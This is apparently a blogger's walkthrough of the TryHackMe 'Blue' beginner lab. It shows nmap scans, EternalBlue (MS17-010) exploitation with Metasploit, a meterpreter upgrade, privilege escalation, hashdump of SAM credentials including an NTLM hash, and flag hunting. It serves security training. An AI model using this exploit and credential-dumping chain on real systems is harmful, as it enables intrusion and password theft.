It has been another long break but again back to writing which I like from the heart. In this post, I am going to take you through steps, which I performed to complete the task on Try Hack Me. The activity Blue has been described by THM as “this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused.“
Step 1: Deploy Target Machine and Connect to VPN network for accessing Target Machine.
Step 2: Activity Questions
Q1: Scan the machine. (If you are unsure how to tackle this, I recommend checking out the room RP: Nmap)
I performed a nmap scan against the target machine. nmap -sV -Pn 10.10.236.183
Q2: How many ports are open with a port number under 1000?
From above the screenshot, there are 3 ports open i.e. 135, 139 & 445.
Q3: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
To identify if the detected service is running a vulnerable version, I used the nmap vulnerability script. nmap -script vuln -Pn 10.10.236.183. The script output indicated that service is vulnerable with smb-vuln-ms017-010.
Q4: Start Metasploit
msfconsole launches Metasploit on the Kali Linux.
Q5: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
search ms17-010 lists out the available module in the Metasploit. We are going to use exploit/windows/smb/ms17_010_eternalblue
Q6: Show options and set the one required value. What is the name of this value? (All caps for submission)
use exploit/windows/smb/ms17_010_eternalblue set the module to be used. show options show all available options. As per the above screenshot, there are 4 required parameters but one of them has not been set i.e. RHOSTS. The target IP address needs to be assigned to RHOSTS. set RHOSTS 10.10.236.183. Also since we are on VPN, we need to update another parameter i.e. LHOST with IP address assigned on the VPN interface.
Q7. Run the exploit!
Q8. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
use post/multi/manage/shell_to_meterpreter will get us a meterpreter shell. We need to identify the session # by using command sessions as it lists the active sessions. The relevant session # should be set using parameter set SESSION session# **1 for this case**
Q9. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)
From the above screenshot, SESSION is the option which needs to be assigned with the relevant active session #.
Q10. Set the required option, you may need to list all of the sessions to find your target here.
As shown in above screenshot, sessions list out all sessions and set SESSION session# set the option to relevant session #
Q11. Run! If this doesn’t work, try completing the exploit from the previous task once more.
run will execute the module and successful exploitation will provide us the meterpreter shell.
Q12. Once the meterpreter shell conversion completes, select that session for use.
session -i session# will open the initially exploited session where we hadn’t got the meterpreter shell.
Q13. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
Q14. List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
Q15. Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
After several attempts, I wasn’t able to migrate 3036[TrustedInstaller.exe], hence used 2688[SearchIndexer.exe] for migrating the process.
Q16. Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
help in meterpreter session list out all available options. hashdump is one of the available commands which is used to dump the content from SAM database. Security Account Manager[SAM] is a database file that stores user accounts’ information. Jon is the non-default user as per the dumped SAM data.
Q17. Copy this password hash to a file and research how to crack it. What is the cracked password?
ffb43f0de35be4d9917ac0cc8ad57f8d is the dumped NTLM hash for user Jon. A Simple online tool can be used to crack the hash value. The cracked value of the hash was *******.
Q18. Flag1? (Only submit the flag contents {CONTENTS})
Use shell to transfer the meterpreter shell to command prompt. Once we are in command prompt, we can use dir flag* /s /p to identify any file with pattern flag*. I searched after setting my present working directory as C:\. As per the below screenshot, 3 flag file is:
- flag1.txt at C:\
- flag2.txt at C:\Windows\System32\config
- flag3.txt at C:\Users\Jon\Documents
Q19. Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
Q20. flag3?
The above questions complete the Blue box. To summarize the activities, we started with nmap to identify open ports. Later on, we used the nmap vulnerability script to verify if the open ports have any vulnerability. Once we got to know port 445 can be exploited with MS17-010, we turned towards Metasploit to find if there is any exploit module ready for the same. We identified the vulnerability and exploited the same. Post exploitation, we had to use another module to convert the obtained shell to meterpreter. After obtaining a meterpreter shell, the focus was on escalating privilege. Process migration was to gain elevated privileges and then we had to go through the flag finding approach.
I hope this simple tutorial would help to gain understanding and help is getting stuck at any point.
You must be logged in to post a comment.